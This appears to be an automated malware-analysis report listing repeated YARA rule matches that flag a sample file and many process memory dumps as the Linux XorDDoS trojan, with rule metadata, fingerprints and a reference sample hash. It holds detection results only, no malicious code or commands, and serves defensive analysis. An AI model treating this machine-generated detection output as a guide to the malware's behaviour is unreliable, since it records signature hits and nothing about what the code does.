Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown

Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 1.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 1.elf, type: SAMPLE	Matched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
Source: 1.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
